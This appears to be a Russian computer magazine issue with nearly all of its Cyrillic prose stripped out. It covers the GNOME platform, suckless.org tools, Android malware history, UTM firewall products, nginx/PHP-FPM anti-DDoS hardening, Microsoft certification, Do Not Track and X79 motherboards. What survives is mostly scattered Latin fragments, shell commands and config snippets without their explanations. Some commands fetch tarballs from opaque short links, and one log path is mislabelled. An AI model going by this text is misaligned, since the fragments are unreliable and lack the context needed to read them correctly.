GVFS GNOME
GnomeVFS,
,
GnomeVFS.


GNOME
,
GTK+,
Pango, Cairo, , ATK, Clutter WebKit.
GTK+,

GIMP, GNOME

. GTK+
(): , , ,
,
.
2.8, GTK+

Cairo,
. Cairo
X Window, -

Microsoft Windows, BeOS, OS/2, Linux


Framebuffer
, PNG,
PDF SVG.
GTK+ Pango,
. Pango

, ,
( ,
). Pango GTK+;
, ,
Firefox GNOME.
GTK+ ATK,

.

(,
)
- .

,
, Clutter. Clutter

GNOME Shell,
.


. OpenGL
,
.
Clutter Intel
Moblin ( MeeGo
Tizen), .

GNOME

Cinnamon GNOME 3


UNIXOID
GNOME 1.0

WebKitGTK+ WebKit, GTK+.


- , Epiphany,
Evolution GNOME Shell.
GNOME Shell, GNOME 3,
JavaScript
Gjs, SpiderMonkey GObject.

GNOME
,
. : PulseAudio, Canberra
GStreamer.
PulseAudio ,
, ,
, , , .
,
,

. PulseAudio GNOME
ESD,
Enlightenment.
PulseAudio GStreamer,
,
- . GStreamer
,
.

,
PulseAudio (ALSA, OSS,
), ,
X Window. API,

.

Canberra.


GNOME 3.0

GNOME ,


(IM). : Avahi,
GUPnP, NetworkManager Telepathy.
GNOME
NetworkManager, , Ethernet-,
Wi-Fi-,
Bluetooth-. NetworkManager

, ,
DHCP IP- DNS-. NetworkManager
,
GNOME

.
GNOME Avahi,
Zeroconf,
IP-
. Avahi
, IP- 169.254.* (
DHCP-),

.local
UPnP,
GUPnP. Avahi
/
, ,
.

Telepathy,

. Telepathy
, Empathy,
,

, ,
, , .
, Sudoku
Tetris ,
AbiWord ( AbiCollab) . Telepathy

.


,

,
GNOME
.

[Figure: GNOME 3.0 platform stack. Groups: Multimedia, User Interface, Communication, Data Storage, Utilities, Core, Desktop Integration, System Integration. Components shown: GTK+, Cairo, Clutter, GStreamer, Telepathy, EDS, Champlain, ATK, Pango, WebKit, Canberra, Avahi, GDA, Enchant, PulseAudio, GUPnP, Tracker, Poppler, GIO, GLib, GObject, upower, GeoClue, udisks, policykit, packagekit, libnotify, gnome-keyring.]


EDS,
GDA, Tracker, GNOME Keyring. EDS (Evolution
Data Server) ,
, .

, .
, Empathy

Empathy, -
IM-. , , ,
. GDA
(GNOME Data Access)
,

.
Tracker GNOME .

KDE4
API Nepomuk, ,
. Tracker ,
,
.
,
,
, .
,
GNOME,
GNOME Keyring,
.
,
, , KeePassX ,

. ,
- GNOME Keyring ()
,
, Keyring,

.


GNOME ,
.
: UPower, UDisks PolicyKit.
UPower
sysfs,

D-Bus,
( , ).
GNOME
, ,


INFO

xine

aRts

KDE 3

libao
aRts

ALSA

PulseAudio

GNOME (libgnome)

ESD

MPlayer

GNOME ,


HIG (Human Interface Guidelines),

Mac OS X KDE4.

libao

PulseAudio

libxine Pulse

libalsa Pulse

UNIX/NCP

libgnome

EsounD

Zerconf

HAL

PulseAudio

ALSA

RTP

OSS

2000

GNOME Foundation.

GNOME

C#,

ALSA

RTP

GNOME

1997


KDE,

QT.

HAL

OSS

HAL


GNOME
1999 .

Linux

TCP/IP

ALSA/OSS


PulseAudio

,
RTP

PulseAudio

,

. UDisks ,
. ,
,
UDisks ,
.

. -
UPower UDisks HAL,
udev HAL
,
freedesktop.org.
,

UPower UDisks, -

2005

GNOME

.



GNOME 3

GNOME 2,

Linux Mint
GNOME 3
Cinnamon
(cinnamon.linuxmint.
com).

, GNOME
freedesktop.org
PolicyKit (polkit). D-Bus

.

Linux, GNOME ,
,
. , freedesktop.org,
,
,

- . z


UNIXOID

(execbit.ru)



SUCKLESS.ORG

Linux-,
,

,
,

- .
suckless.org
,
,
.


UNIX
,
.
2
8 , , , ,
. ,
, , ,
HIG rich user interface,
,
.
; UNIX

, ,
.
.
,
UNIX.

.
, ,
UNIX?

SUCKLESS.ORG
, dwm, dmenu surf. ,
,
,
suckless.org.
10 ,



.
,
. ,
dwm (dynamic window manager)
,
, , , ,
.
,

. , dwm
dmenu,
,
,
.
, /usr/bin (
)
.

surf,
,

dwm
( )
tabbed,
(



wmii

dmenu ,

Acme Plan 9, wmii

fluxbox).
st.

,
, ,

.
suckless.org
.
:
wmii , Acme Plan 9 Oberon;
dwm ,
wmii;
surf -
WebKit;
st ,
;
9base UNIX-,
Plan 9;
dmenu ,
,
;
ii IRC-, ;
sandy , ,
;
slock
;
svkb ;


tabbed .

WMII
wmii (Window Manager Improved Improved)
X Window,
Acme
Plan 9
/
.

suckless.org,

, Google Code: code.google.com/p/wmii.
wmii
, (,
wmi) ,
,
.
suckless.org
,
,
.
wmii ,

,

.
. -, wmii , ,

. -,
wmii
,
.
:
.
,
,
,
,
, :
,
.

, ,

. ,
, .

: , ,
jabber-,
, .
DE, , ,

, ,
,


UNIXOID
(
16:9).
,
?
,
. ,
, jabber-
.
,
, .
, .
, Gimp
. wmii
.
, wmii, ,

( , ),

. , ,
,
. ,
, jabber-
work web.
,
. , wmii

.
wmii
Plan 9,

.
wmii
,
. ,
, :

wmii,
,
, .
, dwm

.
wmii, ,
,
. dwm
,
, ,
,

X Window:
$ xsetroot -name "$(date)"

,
,
,
.

,

config.h
,
.
,
. dwm
,

.

SURF
- surf (surf.suckless.org)
, . WebKit
- ,
.
surf , -,
. surf
,
, .

, dmenu,
<Ctrl+g>.

, dwm wmii,
INFO


suckless.org ,

UNIX;
,


.

$ wmiir read /tag/sel/index

0x1000004
:

dwm ,

$ echo test+terms | wmiir write \


/client/0x1000004/tags

suckless.org

-
werc,
sh-,

Mercurial.

suckelss.org software that sucks less

,
,
(



).

:
$ echo "send sel left" | wmiir write \
/tag/sel/ctl

, ,
.

DWM
dwm (dwm.suckless.org)
suckless.org
.
2000 ,
, -


, dwm


, dzen

surf Google

st

tabbed. ,
CSS- cookies,
,
( - ?)
.
sh,
.
, surf -
. , Google surf
:

.
, awk, cat, dd, diff, du, echo, ls, mkdir,
.
9base - ,

sta.li.

. ,
, :

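#!/bin/sh
# Join the arguments with "+" to build the query string
query=$(echo "$*" | tr ' ' '+')
# Quote the URL so the shell does not treat "?" as a glob character
surf "http://www.google.ru/search?q=$query"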



surf.

ST
suckless.
org st (st.suckless.org), ,
, . VT100, 256 ,
UTF-8, / X11, .
, ,
10 000 ,
config.h.
st
,
, , suckless.org,



, xterm.

9BASE
9base UNIX,
,

Plan 9, Linux/
FreeBSD/MacOSX plan9port. 9base ,
-


STA.LI
suckeless.org sta.li
(STAtic LInux),
UNIX-,
KISS ,
.

,

. .
sta.li ,

, Linux.

, ELF,
,
(,
a.out). , ,
,
,
,
.


, (, USB-).
(initrd, initramfs),
, ,
RAM-. , , (
, ,
256
128 ).

lilo. ,
-
,
rsync, ,
-

/bin
/boot
/dev
/etc
/svc ,
/home
/root
/var
(spool, run, log,
cache)
/share man-,

/devel


/usr, /sbin, /usr/local , Linux, .


, ,
,
-,
UNIX KISS
. ,
: UNIX/
Linux
,

. z



,
suckless.org,
. , ,
e-mail- dmc (hg.suckless.org/dmc),

dzen (goo.gl/8kOGN)
passman (goo.gl/HrMpj).


UNIXOID

(androidstreet.ru)

-

Google
. ,
,
,

Google Play.
,
Android ?


, ,

ANDROID


Android 2010 Trustwave DEF CON.
- Android
FakePlayer,
,
.

Android
,
. 2011
, 65%
Android,

.


, Google
,
Android
.



Android ,
.
-,
.

,
; -,


Android

, ; ,

AirPush, Android; ,
, .

, , Google Play (
Android Market).
? .
-.
. -
, ,
. -
(FakePlayer
13 ),


,
.
(Opera Mini, ICQ, Skype, Angry
Birds),
, .
- ,
,
.
malware,
Android.SmsSend.


. ,

, ,
.
Android Android.
Geinimi,
. Geinimi
Lookout Mobile
Security 2010 .
,

, IMEI IMSI
.
,
(,
).
Geimini
,
, . Geinimi
,

.
. ,
Google Play. ,
,
,

(
).
,

.
,
,

. , :

(
).
.
, .
,
,


.
,
,
(, Skype),
.

,

,
(Adware.Airpush, Adware.Leadbolt,
Adware.Startapp ).


UNIXOID

Android Android


API
Android, . , ,
, -
.
, ,

Google Play, .
,

Android.
.
2011 Android 2.3
- Android,
SD
. ,
,
. ,
.
, 2012-, ,
, , ,
SD-.
,
, SD- ,
.
,
, ,
, -.
-


, .
, , Google,
SD- ,
,
.
, Google ,

. , -
, .
2011
Trustwave
Android API. ,
,
,

. ,
,
,
. ,
Facebook,
Facebook
. -
,
, , .

Android
2011 .
,

, HTC, Motorola
Samsung. ,
, Android,
, . -

13 , 11
.

.
Android.
SmsHider,
, .
Android,
:
,
,
.


,

.

AOSP, ,
,
;
,

. CyanogenMod,

.
, TapLogger,
, ,
. ,
.

.

. , , ,

. ,
,
, ,
. ,

Android


Lookout DroidDream

( )

, ,

.


,
. , Linux
root
,
( Android.
Anzhu), ,
(DBF
BootKit ,
).
,
, .
Exploid, RageAgainstTheCage,
KillingInTheName, ZimperLich, GingerBreak
,
hotplug, bionic .

/system/bin/su,

root-, ,

root, .
, root , ,

. ,

.
, .


Android-, Play Market,

.
.
.
,
Skype,
1500
Android, Sensation
. ,
, -,
,
.
-.

Android-. Crusewind,


,
.
.
Google Play. Google
( Android Market).
2011 , 21 DroidDream
.
,
. ,



,

Google Play, . .
. .
, .
,
.
.
. -,
.
,

.


UNIXOID
MYAndroid Protection Antivirus
NQ Mobile Security
Zoner AntiVirus Free

Android.Haktool.Faceniff.A 2012

Google ,

56, 200 000
. ,
Symantec, Samsung Lookout,
, Google
Android Market Security Tool,
. Symantec
13 , Android.
Counterclank,
Google Bouncer
,
.

?
, , .
? :
99% ,
, Google Play,
Amazon Appstrore GetJar. ,

, ,
,
.
-
( ,
Google
, ), ,
, , . :
, Android
,
,
AV-Test ( 90% ):
avast! Free Mobile Security
Dr.Web anti-virus Light
F-Secure Mobile Security
IKARUS mobile.security LITE
Kaspersky Mobile Security (Lite)
Lookout Security & Antivirus
McAfee Mobile Security

, ,
: , , , .

, ,
, . , ,
,
.

CyanogenMod MIUI, .
,
. CyanogenMod
MIUI,
,
(MIUI ,
).

Android ,
. ,
, ,
,
, , Android 2011 .
,
,
,
. z

TapLogger


SYN/ACK
SYN/ACK

grinder (grinder@synack.ru)


UTM-
,

. IT-, UTM
,
.


UTM?

,
.
,
.
.

, UTM (Unified Threat Management,
).
UTM :
DPI (Deep Packet Inspection), (IDS/IPS), , .
VPN,
, ,
.
, .
, .
UTM, , , / .
UTM
2530% ( firewall),
,
, . ,
,
, , .
,
,
. :
UTM-
, IPS, VPN
. UTM
, ,
. ,
,
, CPU.
,
.
opensource- (Untangle, pfSense, Endian

- FortiGate


), .
.

FortiGate
: FortiGate
: fortinet-russia.ru
:
:

Fortinet, 2000 , UTM-,



(FortiGate-30) (FortiGate-5000).
FortiGate ,
.
, IDS/IPS, ,
, - .
DLP, VoIP, , WAN, ,
, PKI .
( ).
, ,
. -
75 , ,
. , .
(Skype, P2P, IM )
, traffic shaping
. .
LAN
WAN-,
RIP, OSPF BGP.
: ,
NAT, FortiGate
. Wi-Fi FortiWiFi.
( Windows, Android), ,
- FortiClient,

firewall Check Point

(firewall, , SSL IPsec
VPN, IPS, -, ). Fortinet
FortiManager FortiAnalyzer.
- , FortiGate/FortiWiFi FortiExplorer
( Win Mac OS X),
GUI CLI ( Cisco).
FortiGate FortiASIC, , .
FortiOS.

Check Point UTM-1


: Check Point UTM-1
: rus.checkpoint.com
:
:

Check Point
UTM: UTM-1, UTM-1 Edge ( ) Safe@Office ( ).
: , IPS, , , SSL VPN . , (
200 ),
IM, P2P- Skype. -
URL-, Check Point , . HTTP/FTP/SMTP/POP3/IMAP, . UTM-1
W Wi-Fi. IPS
:
, ,
. , 10%
, .

UTM. - IP-, , .
OSPF, BGP RIP, -

grinder (grinder@synack.ru)

(, RADIUS,
SecureID ), DHCP.
, Software
Blades ( ) ,
. , Web Security
( -), VoIP ( VoIP),
Advanced Networking, Acceleration & Clustering ( ). ,
Web Application Firewall Advanced Streaming Inspection,
Web Security, , TCP-,
, ,
.
Telnet/
SSH.
Check Point SmartCenter,
Security Management Architecture
Check Point, . SmartCenter , ,
LDAP, , .
UTM Check Point
Update Service.

ZyWALL 1000
: ZyWALL 1000
: zyxel.ru
:
:

, ZyXEL, -
UTM,
ZyWALL USG 50/100/300/1000/2000,
( 500 ).
ZyXEL . , ZyWALL 1000 ,
. , IDS/IPS, (Blue
Coat Commtouch), VPN (IPsec,

- ZyWALL


Untangle

SSL L2TP over IPsec VPN). ,


. - IPsec
VPN SSL VPN DES 56 .
(IP, ).

IM, P2P, VoIP, mail . IDS , , , DDoS . (Anomaly Detection
and Prevention) 2-
3- OSI, , 32 . End Point Security
, ,
firewall, , , .
, .
.
LDAP, Active Directory, RADIUS, . VoIP SIP .323
firewall NAT, VPN-.

( Commtouch, VPN)
. CLI -.
.

Untangle Server
: Untangle Server 9.2.1 ruiser
: untangle.com
: GPL
:
: x86, x64
:
Pentium 4 AMD, 1 RAM, 80 HDD, 2 NIC

*nix- UTM,
. :
,


Untangle

, , ,
. , opensource-.
Untangle, ,
2008 , . Debian, .
Untangle Gateway
( 300 )
Forefront TMG
.
, Untangle Server. 5000 .
Untangle
. -
,
, . (Premium, Standard, Education Premium, Education Standard
Lite), ,
: Filter Services.
opensource- Lite,
13 ,
spyware, , , , , IDS/IPS, OpenVPN,
(Captive Portal). opensource, Snort, ClamAV, SpamAssasin, Squid.
, Untangle : , NAT, DMZ, QoS, DHCP- DNS-.
Reports, Lite,

UTM
DPI,
(IDS/
IPS), ,


: , ,
, ; e-mail PDF, HTML,
XLS, CSV XML.
:
Failover, ,
Active Directory,
. , . ,
Untangle.
,
Java,
. Untangle
*nix, ,
. ,
, .

Endian Firewall
: Endian Firewall Community 2.5.1
: endian.com/en/community
: GPL
: x86
: CPU 500 , 512 M RAM, 2 HDD

Endian Firewall
, ,
. . GPL,
ISO- Community
Edition .
CentOS Linux ,
, IDS/IPS, HTTP/FTP/POP3/SMTP-, ,
, - -, .
VPN OpenVPN IPsec . 20 , blacklist .
ACL,
, , IP, . , , .
e-mail .
, Active Directory, LDAP

Snort Endian Firewall

RADIUS. VLAN,
QoS; SNMP. ClamAV,
Sophos.
- .
,
, (LAN, Wi-Fi, DMZ).
IP-, MultiWAN.
RED,
ORANGE, BLUE GREEN, firewall ,
.
, ,
.

, UTM , , ,
LAN.
.
OpenSource Endian Firewall Untangle. z
INFO

UTM

KERIO CONTROL

UTM (Charles
Kolodgy) IDC (International Data Corporation) Worldwide
Threat Management Security Appliances 2004-2008
Forecast ( 2004 ),

,
.

(firewall, DPI ), ,
UTM-,
.

Kerio Control (kerio.ru/ru/control)


. Kerio WinRoute Firewall
,
, .
UTM-,
NAT -, (
), , - -
(53 ), ,
, WAN, VPN-,
. Kerio Control Windows,
.
-.


UTM

firewall,

.


SYN/ACK
SYN/ACK

(execbit.ru)


NGINX + PHP-FPM +
TEST-COOKIE + GEOIP +
NAXSI

- Apache
.
nginx ,


, -.
,
?


, ,
-,
.
, ,
PHP, DDoS
. FastCGI-
Apache suexec suphp,

nginx.
FastCGI- PHP-FPM,
. PHP-
, .
DDoS testcookie-nginx-module,
, HTTP cookie .
geoip,
IP- .
,
.
Debian (Ubuntu),
- Arch Linux, FreeBSD.
.

NGINX, MYSQL, PHP-FPM


nginx, MySQL PHP:
$ sudo apt-get install mysql-server mysql-client \
php5-fpm php5-mysql nginx

nginx:
# vi /etc/nginx/nginx.conf
# Number of worker processes
worker_processes 4;
# Reduce the number of gettimeofday() calls
timer_resolution 100ms;
error_log /var/log/nginx/error.log;
pid /var/run/nginx.pid;
events {
    # Maximum number of simultaneous connections
    # per worker process
    worker_connections 4096;
}
http {
    # MIME type map
    include /etc/nginx/mime.types;
    access_log /var/log/nginx/access.log;
    # Close keepalive connections
    # after 2 seconds
    keepalive_timeout 2;
    # Per-site configuration files
    # (Debian-like layout)
    include /etc/nginx/sites-enabled/*;
}


,
. : /home/
_/, ,
www logs, , -, .

IP , www , ,
- .
Apache, nginx .
nginx ,
include ( ).
, :
# vi /etc/nginx/sites-available/template
server {
    listen 80;
    server_name _HOSTNAME_;
    # No log_format named "main" is defined in nginx.conf above,
    # so the default (combined) format is used
    access_log /home/_USERNAME_/logs/_HOSTNAME_.access_log;
    error_log /home/_USERNAME_/logs/nginx/_HOSTNAME_.access_log info;
    root /home/_USERNAME_/www/_HOSTNAME_;
}


, /etc/nginx/
sites-enabled/. :
UNIX-,
www-users,
www logs.
,
, _HOSTNAME_ ,

nginx.conf

PHP-FPM


nginx + PHP-FPM Apache + mod_php

_USERNAME_ ( ), www . /etc/nginx/sites-enabled/,


- . , , .
, ( ssh-)
-,
PHP MySQL. FastCGI
, PHP-

.
, CGI-
PHP-FPM (PHP FastCGI Process Manager),
PHP- PHP- . ,
, (
):
# vi /etc/nginx/sites-available/template
location ~ \.php$ {
    # Answer 404 instead of passing a non-existent script to PHP
    try_files $uri =404;
    fastcgi_pass unix:/var/run/php5-fpm/_USERNAME_.sock;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_param PATH_INFO $fastcgi_script_name;
    include /etc/nginx/fastcgi_params;
}

CGI- , ,
/var/run/php5-fpm/_USERNAME_.sock,
PHP-FPM.
PHP,
:
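# vi /etc/php5/fpm/template
[_USERNAME_]
; UNIX socket the pool listens on
listen = /var/run/php5-fpm/_USERNAME_.sock
; Owner, group and access mode of the socket
listen.owner = _USERNAME_
listen.group = www-users
listen.mode = 0600
; User and group
; the PHP processes run as
user = _USERNAME_
group = www-users
; Spawn worker processes on demand
pm = dynamic
; Maximum number of worker processes
pm.max_children = 50
; Number of workers started together with the pool
pm.start_servers = 20
; Minimum and maximum number
; of idle workers
pm.min_spare_servers = 5
pm.max_spare_servers = 35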


. ,

- NGINX NAXSI
Naxsi (Nginx Anti XSS SQL Injection)
Web Application Firewall nginx,
, -, SQL
Injections, Cross Site Scripting, Cross Site Request Forgery, Local &
Remote File Inclusions. ,
Naxsi , ,
,
HTTP-. ,

404. :
. ,
.
2011- Google
Code (naxsi.googlecode.com),
OWASP.
Linux ( , Debian/Ubuntu) FreeBSD.
nginx (--add-module=../naxsi-x.xx/naxsi_src,


naxsi ).
http include /etc/nginx/naxsi_core.
rules, .
location
( default_location_config.example).
, , CheckRule
. Naxsi
whitelist, .
LearningMode Naxsi
( LearningMode Naxsi ,
,
). ,
CheckRule .
, ,
rules_generator.py,
WL.
(grinder@synack.ru)


Wiki-, PHP-FPM

UNIX-
,
/etc/php5/fpm/pool.d/_.conf
PHP-FPM /etc/init.d/php5-fpm reload. , Wordpress,
PHPMyAdmin, Drupal . nginx
- .

NGINX DDOS
- , . -,
nginx,
(][_07_2010). -, - DDoS. ,
, DDoS - ,
, . SYN/ACK UDP iptables,
. DDoS-,
-, ,
(HTTP-). , ,
.
-
, , ,
. ,
PHP, eAccelerator
( ),

PHP-FPM

, .
. , .
, ,
DDoS- .
,
, 90% ,
cookie,
JavaScript HTTP-.
testcookie-nginx-module.
,
GET-
cookie. -
,
cookie, .

, URL.
nginx :
- . :
$ sudo apt-get install build-essential
$ cd /tmp
$ wget http://goo.gl/Mh7IJ
$ wget http://goo.gl/gyvs3 -O test-cookie.tar.gz
$ tar -xzf nginx-1.2.0.tar.gz
$ tar -xzf test-cookie.tar.gz
$ cd nginx-1.2.0
$ ./configure --prefix=/usr/local \
--add-module="$(echo ../kyprizel-testcookie-nginx-module-*)"
$ make
$ sudo apt-get remove nginx

nginx-testcookie-module ( JavaScript JavaScript)


(execbit.ru)

$ sudo make install

DDoS . DDoS
,
. , ,
IP- . ,
,
.
, , geoip.
nginx,
. , IP- :

nginx:
$ cd /tmp
$ wget http://goo.gl/H08BC
$ cd /etc/init.d/
$ sudo tar -xjf /tmp/nginx-init-ubuntu_v1.2.1.tar.bz2
$ sudo chmod +x nginx
$ sudo update-rc.d -f nginx defaults

, nginx , testcookie-nginx-module - ( http):


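# vi /etc/nginx/nginx.conf
http {
    # Enable the module
    testcookie on;
    # Name of the cookie
    testcookie_name BPC;
    # Secret string used to compute the cookie value
    testcookie_secret keepmesecret;
    # Key the session is bound to (here the client IP address)
    testcookie_session $remote_addr;
    # GET parameter that counts cookie-setting attempts
    testcookie_arg attempt;
    # Maximum number of attempts to set the cookie
    testcookie_max_attempts 3;
    # Check GET requests only
    testcookie_get_only on;
}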

$ cd /etc/nginx/
$ sudo wget http://goo.gl/hzB5W

IP- nginx
( http):
geoip_country /etc/nginx/conf/GeoIP.dat;

:
if ($geoip_country_code = CN) {
return 444;
}


.
, testcookie off;
/etc/nginx.d/sites-enabled/ (
,
,
). . doc/usecases.txt ,
, ,
AES-128 JavaScript-.
.

CN ,
, 444 -.
,
.
.

nginx -
, . Apache,
. PHP-FPM -DDoS
,
, . z

WWW



server_name_in_redirect off;
listen 80;
server_name _;
access_log /var/log/nginx/$host.access_log main;
error_log /var/log/nginx/logs/$host.access_log info;
root /var/www/$host;

,

,
:
# vi /etc/nginx/sites-enabled/default
server
{
if ($host ~* www\.(.*))
{
set $host_without_www $1;
rewrite ^(.*)$ http://$host_without_www$1/ permanent;
}


}

/var/www/.
,
mkdir /var/www/exemple.com,
.

habrahabr.ru/
post/139931/

testcookie-nginx-module
.
habrahabr.ru/
post/141989/
cookie
Flash.

WARNING

nginx

.


(irud@live.ru)

MICROSOFT
FAQ

,
,

.

?

.
Microsoft .
- ( MCM/MCA) , ,
, . ,
-
.
( MCTS/MCITP).
,
-
. , .


,

,

MCTS/MCITP,
. Prometric ( -)
.
.
,
( ).
Prometric,
, 500600
.
, ,
. , , . .
,
. ,
Finish.
.

?
, , . :
. , ,
. , , -
,
, .
.
: ,
, .
,
, - . , ,
,
, .
, . ,
,
. ? ,
.
,
.

?
, , . ,
,
, .

?
-,
. ,

Microsoft


, Microsoft

.
, .
, ,
-.

?
-
.
, , ,
.
, , , .
, , ,
,
.

?
Microsoft . , , MCSE, ,
WSUS.
, NAP
Microsoft,
90% . , .
? , . : ) ; ) ;
) ; ) ? , .
, , : ,
. , ,
, ,
. , ,
, .
. , ,
, - .

(irud@live.ru)

Microsoft


. .
Present Simple
. -,
, ,
, .


?
, . ,
, ,
. ,
.
. , , ,
.
, ,
, . , , .
,
, . ,
, - ,
. , , , ,
, .
, MCSE
. ? 80%
. ,
- .
, .
, Microsoft
2006-,
.

Microsoft 1000- 700. ,


. , , , .
, ,
.

(, 70-662: www.microsoft.com/learning/en/us/exam.aspx?id=70-662).
. , ,
.
1. . ,
, . ,
, , , , . -
. Measure up
. , ,
, -

?
,
. . -, - ,

.
(MOC) .
. , Backup/
Restore Exchange. ,
( , ,
, Dial Tone ).
, ,
.
, ,
(
).
100%- .
2. . MCTS Self
Paced Training Kit
, -
, - Exchange,
SharePoint. , 16
RAID-. Self Paced Training
Kit , :
Self Paced . Training Kit ,
.
,
8001500 .
.
MCSE. , - . ,
.
3. .
. , , ,

. , . , - .
: .


. ,
,
80

?
. , ,
80 .
,
, . Measure up,
, .
. ,
, , . , ,
.
. ,
. Exchange 2010, , ,

, Lotus.
( ),
,
. / -. ,
, .
. , ,
, , , .
, .
- , .
, . ,
.
. ,
?.
, - . ,
( ) .
.


700 , , , . , . ,

MCTS .
,
, , .
,
.
, . ! z

Mifrill (mifrill@real.xakep.ru)

DO NOT TRACK
do not track . , , , - ,
? , Twitter,
Do Not Track .

Do Not Track


. , , .
:
.
,
. .
Google,

. , Facebook
<bgsound>
e-mail.
,
.
, , :
, . ,
, .

( ,
),
. Do
Not Track ,

- .



Do Not Track, .
, .
, Do Not
Track? HTTP-,
: 1 (DNT: 1)
,
; 0 ; null
. ,
1,
.

, 2009 Firefox
, DNT-

,
?

(SEO)

(donottrack.us).
Firefox 4. 2010
Microsoft,
Do Not Track IE9. Do
Not Track
Mozilla Firefox, Apple Safari
Opera. , HTTP-
DNT , Firefox
DOM-
Do Not Track JavaScript.
, Chrome?
. ,

,
Chrome . Chrome, , Keep My Opt-Outs. :)
DNT ,

,

. Do Not Track
(W3C).

Twitter Do Not Track


DNT ?
. , ,
Ghostery, ScriptNo, Adblock Plus ( Tor,
),
. DNT

.
,
Google, .

cookie (, -
, e-mail )

YouTube
cookie , DNT.
, Internet and Society
,
.
64
Advertising Option Icon
Do Not Track. , 33
cookie
,
.
, , Do Not Track .
, . ,
Do Not Track Twitter!

,
,
,
.
Do Not Track
, .
, Do-Not-Track
Online Act of 2011.



. ,
,
.
, ,
DNT ,
,
cookie HTTP-. , . z


FERRUM

!

INTEL X79 EXPRESS
,
,

.
, Intel.
.
Intel X79 Express
.
. , ,
Intel Sandy Bridge-E
, 200 , . 350 .

. ,
, -
2530 .
, ,
,
. , , !

!
. , - .
,
Intel X79 Express Intel P67
Express Intel Z68 Express.
.
, SSD-
BCLK.
USB 2.0, SATA-II SATA 3.0.
Intel X79 Express
Intel Sandy Bridge-E. -



40 PCI Express 3.0
DDR3.
, Intel Sandy Bridge-E ,
.
, , .
.

X79
PCI Express 3.0

. -
. ,
AMD Radeon HD 79XX
PCI Express 3.0.
, ,
c PCI Express 2.0, ,
. ,
.
.
DDR3 ,
. , ,
.


: .

ASRock X79 Extreme4-M


ASUS Rampage IV Extreme
Foxconn Quantumian 1
GIGABYTE GA-X79-UD5
Intel DX79SI
MSI X79MA-GD45


:
Intel Core i7-3960X, 3,3
:
Thermaltake Frio OCK
:
MSI Twin Frozr II HD 5830, 1024
:
G.Skill F3-17000CL9D-8GBXM,
44
:
Corsair CSSD-F120GB2, 120
:
ENERMAX Platimax, 750
:
Windows 7


.

25, 13.33. ,

, BCLK
CPU RAM. , CPU Strap,

125, 166 250 .

, 125
.
166
,
.
250
, .
125 .
.

Intel Sandy Bridge-E Intel Core i7-3820
125 36 = 4500 .
!
, .
,
.

wPrime
1.55 ( 1024m), WinRAR 4.0 ( ) Super Pi 1.5XS ( 1m).


ASROCK X79 EXTREME4-M


, 79- - mATX ?
!

. , Extreme
ATX- ASRock Extreme3, Extreme4,
Extreme6GB, Extreme7 Extreme9.
- mATX ,
. , PCI Express x16 PCI.
PEG 16 + 16 + 8. 3-Way SLI
3-Way CrossFireX :
. , - mATX-
. SLI/CrossFireX !
ASRock X79 Extreme4-M
/ POST-.
BIOS.
.
, .
. , ,
X-FAN.
, , . , CPU
Strap, 125 .
, . ASRock X79 Extreme4-M
. 105 .

7000
.

ASUS RAMPAGE IV EXTREME


, ,
, ASUS
Rampage IV Extreme. , . , PCI
Express x16. 16 + 16 + 16 + 16.
8. , PEG PCI Express x1.
ASUS Rampage IV Extreme RoG (Republic of Gamers),
, - . , OC Zone /
, POST,
. PCI Express, LN2 Slow.
?
! OC Key. I/O ,
Windows BIOS. . , -
.
, , Extreme
Engine Digi+ II.
, , .
, .
, ASUS Rampage IV
Extreme .
133 !

13 000
.


FOXCONN QUANTUMIAN 1
, . /
. DIMM LED-
POST- ,
. .
Foxconn Quantumian 1 32 .
PCI Express x16.
.
16 + 16. ,
PCI Express x1 PCI.
PCI Express x16
16 + 8 + 8 + 8.
. BIOS , ! Performance
.
. BIOS.
.
VCore, VTT , . ,
, 0,97 .
Default. BIOS Foxconn Quantumian 1
132,5 . ! !

9000
.

GIGABYTE GA-X79-UD5
GIGABYTE GA-X79-UD5
79- .
- E-ATX
DIMM, PCI Express x16, PCI Express x1 PCI.
Power,
. OC-Dual
BIOS, , Clear CMOS.
SATA. GIGABYTE GA-X79-UD5 !
PCI-E-
Bluetooth- Wi-Fi-. , .
3D Power 3D BIOS . : GIGABYTE GA-X79-UD3,
GIGABYTE GA-X79-UD5 ,
.
.
130 .

4DDR3, 10662400
3PCI Express x16, 1PCI
4SATA II, 3SATA 3.0, 1eSATA 3.0
Ethernet, 10/100/1000 /

:
:

7.1 CH, HDA


6USB 2.0, 2USB 3.0, 2S/PDIF,
1eSATA, 1IEEE1394, 1RJ-45, 2PS/2,
6
mATX


ASRock X79
Extreme4-M

:
:
:
:

-:

9000

Foxconn Quantumian1

ASUS Rampage IV
Extreme

8DDR3, 10662400
5PCI Express x16, 1PCI Express x1
4SATA II, 4SATA 3.0, 2eSATA 3.0
Ethernet, 10/100/1000 /; Bluetooth v2.1
+ EDR
7.1 CH, HDA
8USB 2.0, 4USB 3.0, 1S/PDIF, 1Bluetooth,
2eSATA, 1RJ-45, 1PS/2, 5

4DDR3, 10662400
4PCI Express x16, 1PCI Express x1, 1PCI
6SATA II, 4SATA 3.0, 2eSATA 3.0
Ethernet, 10/100/1000 /

E-ATX

ATX

7.1 CH, HDA


6USB 2.0, 2USB 3.0, 1S/PDIF, 2eSATA,
2RJ-45, 1PS/2, 6


INTEL DX79SI
! , Intel
DX79SI. , Intel ? , Intel Extreme Edition
.
Intel DX79SI DIMM, 64 . , PCI
Express x16, 16 + 16 + 16.
PCI Express x1, PCI.
SATA- ,
Intel X79 Express . . , , . Intel DX79SI
Bluetooth Wi-Fi. USB 3.0.
Intel DX79SI . ,
, 104,7 .
. . ,
LED- POST-. ,
hwbot.org,
DELLY, Intel DX79SI 135 .

10 000
.

MSI X79MA-GD45
MSI X79MA-GD45 .
!
DIMM ,
.
64 2400 . PCI
Express x16 3.0 ,
. ,
, PCI Express x1.
MSI
Military Class. Intel
X79 Express .
DrMOS II, 130 , SFC, Hi-c
.
. !

130 . , .

7000
.


GIGABYTE GAX79-UD5

Intel DX79SI

Intel Core i73960X

8DDR3, 10662133
3PCI Express x16, 2PCI Express x1, 1PCI
4SATA II, 6SATA 3.0, 2eSATA 3.0
Ethernet, 10/100/1000 /; Bluetooth v4.0;
Wi-Fi 802.11n
7.1 CH, HDA
7USB 2.0, 2USB 3.0, 1S/PDIF, 2eSATA,
1IEEE 1394, 1RJ-45, 1PS/2, 5

8DDR3, 10662400
3PCI Express x16, 2PCI Express x1,
1PCI, 4SATA II, 2SATA 3.0
Ethernet, 10/100/1000 /;
Bluetooth; Wi-Fi
10 CH, HDA
